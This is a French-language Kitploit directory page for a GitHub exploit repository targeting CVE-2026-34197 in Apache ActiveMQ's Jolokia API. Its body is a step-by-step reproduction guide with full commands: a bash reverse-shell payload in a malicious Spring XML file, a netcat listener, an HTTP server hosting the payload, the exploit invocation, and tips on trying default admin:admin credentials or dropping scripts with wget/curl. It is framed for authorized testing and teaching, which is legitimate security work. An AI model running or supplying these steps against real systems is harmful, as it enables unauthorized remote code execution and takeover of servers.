Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — Script d'exploitation pour CVE-2026-34197, ciblant l'API Jolokia d'Apache ActiveMQ pour obtenir une exécution de code à distance via une configuration Spring XML malveillante, avec capacité de shell inversé. | Kitploit
Outils/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

Script d'exploitation pour CVE-2026-34197, ciblant l'API Jolokia d'Apache ActiveMQ pour obtenir une exécution de code à distance via une configuration Spring XML malveillante, avec capacité de shell inversé.

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Guide de reproduction de la vulnérabilité RCE ActiveMQ Jolokia

Ce dépôt fournit un environnement de reproduction et un script d'exploitation pour la vulnérabilité d'exécution de code à distance (RCE) basée sur l'interface API Jolokia exposée par Apache ActiveMQ (/api/jolokia/). En appelant l'opération addNetworkConnector, on force ActiveMQ à analyser un fichier de configuration Spring XML distant malveillant, exploitant ainsi MethodInvokingFactoryBean pour exécuter des commandes système.

📁 Fichiers inclus

  • payload.py : Script d'exploitation principal, envoie des requêtes HTTP POST avec un nom de Broker dynamique.
  • payload.xml : Fichier de configuration Spring Bean malveillant, contenant la charge utile de commande pour un reverse shell.

🛠️ Préparation de l'environnement

  1. Environnement Python 3
  2. Installation des dépendances :
    root@kitploit:~
    pip install requests
    
  3. Machine d'attaque (ex. serveur cloud) : Doit disposer d'une IP publique, pouvoir ouvrir un port de service HTTP et un port d'écoute pour le reverse shell.
  4. Machine cible : Service ActiveMQ vulnérable (ex. image Docker apache/activemq-classic:6.1.0).

🚀 Étapes de reproduction

1. Configurer la charge utile d'attaque (payload.xml)

Sur la machine d'attaque, ouvrez payload.xml et trouvez la section suivante :

root@kitploit:~
<value>bash -c 'bash -i >& /dev/tcp/VOTRE_IP_SERVEUR_CLOUD/15000 0>&1'</value>

Remplacez l'IP par l'adresse IP publique de votre serveur cloud. Si l'environnement cible ne dispose pas de bash, remplacez-le par sh ou une autre méthode d'exécution selon l'environnement cible.

2. Démarrer l'écoute du reverse shell

Sur la machine d'attaque (serveur cloud), ouvrez un terminal et écoutez sur le port spécifié (ex. 15000) :

root@kitploit:~
nc -lvvp 15000

Remarque : Assurez-vous que le groupe de sécurité/pare-feu du serveur cloud autorise le trafic TCP entrant sur le port 15000.

3. Démarrer le service HTTP pour héberger la charge utile

Sur la machine d'attaque (dans le même répertoire que payload.xml), démarrez un serveur HTTP pour permettre à la cible de télécharger le fichier XML :

root@kitploit:~
python3 -m http.server 9000

Remarque : Assurez-vous également que le groupe de sécurité/pare-feu du serveur cloud autorise le trafic TCP entrant sur le port 9000.

4. Exécuter le script d'exploitation

Sur la machine locale (ou la machine d'attaque), exécutez payload.py. Le script accepte via les paramètres de ligne de commande l'IP:port de l'ActiveMQ cible (-t) et l'IP:port de la machine d'attaque hébergeant le XML (-a).

root@kitploit:~
python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000

Après exécution, le script génère automatiquement un brokerName aléatoire (ex. rce_a1b2c3), afin de résoudre complètement l'erreur de conflit de noms java.io.IOException : Network Connector could not be registered in JMX.

5. Obtenir le shell

Si l'exploitation réussit :

  1. Votre serveur HTTP (python3 -m http.server 9000) affichera une entrée de requête GET 200 pour /payload.xml.
  2. Votre écouteur nc recevra une connexion de reverse shell provenant de la machine cible.

⚠️ Résolution des problèmes courants

  1. Le XML est bien récupéré (HTTP 200), mais aucun shell n'est reçu :
    • Cause A : Le groupe de sécurité du serveur cloud bloque le reverse shell (le trafic entrant sur le port 15000 n'est pas autorisé).
    • Cause B : La commande /bin/bash n'existe pas dans le conteneur cible (courant avec les images de base minimalistes comme Alpine). Modifiez la commande d'exécution dans payload.xml en /bin/sh, ou déposez un script via wget/curl puis exécutez-le.
  2. La cible renvoie une erreur 401 Unauthorized :
  • Cause : Les versions récentes d'ActiveMQ / Jolokia nécessitent une authentification par nom d'utilisateur et mot de passe.
  • Solution : Si les identifiants par défaut sont utilisés, ajoutez une authentification Basic Auth à la requête (ex. admin:admin).

🛡️ Avertissement de non-responsabilité

Ce script et ces instructions sont destinés uniquement aux tests de sécurité autorisés et à l'apprentissage pédagogique. Toute utilisation pour des tests illégaux non autorisés est strictement interdite. L'utilisateur est responsable de ses propres actions.

Télécharger l’outil